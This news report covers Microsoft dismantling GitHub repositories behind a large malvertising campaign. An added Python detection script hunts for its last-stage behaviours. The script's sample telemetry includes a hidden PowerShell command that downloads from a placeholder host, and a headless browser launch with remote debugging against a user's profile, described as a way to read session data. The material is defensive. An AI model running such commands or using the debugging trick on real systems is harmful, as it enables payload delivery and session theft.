Microsoft has taken down an undisclosed number of GitHub repositories used in a massive malvertising campaign that impacted almost one million devices worldwide.

The company's threat analysts detected the attacks in early December 2024 after observing multiple devices downloading malware from GitHub repositories; that malware was later used to deploy a string of other payloads on the compromised systems.

"This activity is tracked under the umbrella name Storm-0408 that we use to track numerous threat actors associated with remote access or information-stealing malware and who use phishing, search engine optimization (SEO), or malvertising campaigns to distribute malicious payloads," Microsoft said.

While GitHub was the primary platform used to host the payloads delivered in the campaign's first stage, Microsoft Threat Intelligence also observed payloads hosted on Dropbox and Discord.

The malvertising videos redirected users to the GitHub repositories, which infected them with malware designed to perform system discovery, collect detailed system information (for example memory size, graphics details, screen resolution, operating system (OS), and user paths), and exfiltrate the harvested data while deploying additional second-stage payloads.

In the last stage of the attack, the AutoIt payloads use RegAsm or PowerShell to open files, enable remote browser debugging, and exfiltrate additional information.

Microsoft's report provides additional and more detailed information on the various stages and payloads used across the multi-stage attack chain of this complex malvertising campaign.
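The two last-stage behaviours named above, a browser started with remote debugging enabled and RegAsm or PowerShell launched by a dropped payload, are visible in ordinary process-creation telemetry. The following hunt is an added example written for this page; it is not code from Microsoft's report or from BleepingComputer. It assumes events exported as JSON lines with `ts`, `image`, `parent_image` and `command_line` fields (an assumed layout, not any particular EDR's schema), it relies on the fact that Chromium-based browsers expose remote debugging through the `--remote-debugging-port` / `--remote-debugging-pipe` switches, and it uses a heuristic (an assumption, not a rule from the report) that RegAsm.exe or PowerShell spawned by a parent running from a user-writable directory such as AppData, Downloads or Temp deserves a look. All sample events are constructed.

```python
"""Hunt process-creation events for the last-stage behaviours described in
the article: a Chromium browser launched with remote debugging on, and
RegAsm.exe / powershell.exe spawned by a parent in a user-writable directory.

Added example; the log format and sample events below are constructed and the
user-writable-parent heuristic is an assumption, not a rule from the report.
"""
import json
import re
from dataclasses import dataclass

# Chromium-based browsers that honour the remote-debugging switches.
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "chromium.exe"}
# Binaries the article says the AutoIt stage uses for its final actions.
LOLBINS = {"regasm.exe", "powershell.exe", "pwsh.exe"}

# --remote-debugging-port=9222 or --remote-debugging-pipe anywhere on the line.
REMOTE_DEBUG = re.compile(r"--remote-debugging-(?:port|pipe)(?:=(\S*))?", re.I)
# Heuristic (assumption): parent image lives under a user-writable path.
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(?:appdata|downloads|desktop|documents)\\|\\temp\\", re.I
)

# Constructed sample telemetry, one JSON object per line (not a real export).
SAMPLE_LOG = r"""
{"ts": "2024-12-05T10:01:02Z", "image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" https://example.test/"}
{"ts": "2024-12-05T10:03:17Z", "image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "parent_image": "C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe", "command_line": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --remote-debugging-port=9222 --headless --user-data-dir=\"C:\\Users\\alice\\AppData\\Local\\Google\\Chrome\\User Data\""}
{"ts": "2024-12-05T10:03:20Z", "image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\RegAsm.exe", "parent_image": "C:\\Users\\alice\\AppData\\Roaming\\svc\\player.exe", "command_line": "RegAsm.exe"}
{"ts": "2024-12-05T11:15:00Z", "image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\RegAsm.exe", "parent_image": "C:\\Program Files\\Vendor\\setup.exe", "command_line": "RegAsm.exe /codebase Vendor.Interop.dll"}
{"ts": "2024-12-05T11:20:41Z", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Users\\alice\\Downloads\\Setup.exe", "command_line": "powershell.exe -w hidden -nop -c \"iwr https://example.test/next\""}
"""


@dataclass(frozen=True)
class Finding:
    ts: str
    rule: str
    image: str
    parent_image: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> list[dict]:
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events: list[dict]) -> list[Finding]:
    """Apply both rules to every event; an event may yield more than one finding."""
    findings: list[Finding] = []
    for ev in events:
        image = basename(ev["image"])
        parent = ev.get("parent_image", "")
        cmd = ev.get("command_line", "")
        # Rule 1: a browser started with the remote-debugging switch present.
        if image in BROWSERS:
            match = REMOTE_DEBUG.search(cmd)
            if match:
                findings.append(Finding(ev["ts"], "browser_remote_debugging",
                                        ev["image"], parent, match.group(0)))
        # Rule 2: RegAsm / PowerShell whose parent runs from a user-writable path.
        if image in LOLBINS and USER_WRITABLE.search(parent):
            findings.append(Finding(ev["ts"], "lolbin_from_user_writable_parent",
                                    ev["image"], parent, basename(parent)))
    return findings


def hunt(text: str) -> list[Finding]:
    """Convenience wrapper: raw JSON-lines text in, findings out."""
    return detect(parse_events(text))


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"{f.ts} {f.rule}: {f.image} <- {f.parent_image} ({f.detail})")
```

Run against the constructed sample, the hunt flags the headless Chrome launch with `--remote-debugging-port=9222`, the RegAsm.exe spawned from AppData, and the hidden PowerShell spawned from Downloads, while leaving the ordinary Chrome start and the RegAsm.exe run by an installer under Program Files alone. Rule 1 is the higher-confidence signal: there is very little legitimate reason for a user's browser to be started with remote debugging enabled by a process in Temp, and the `--user-data-dir` pointing at the real profile is what lets an attacker read session data through the debugging interface.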
Source: www.bleepingcomputer.com. Published: Thu, 06 Mar 2025 20:55:18 +0000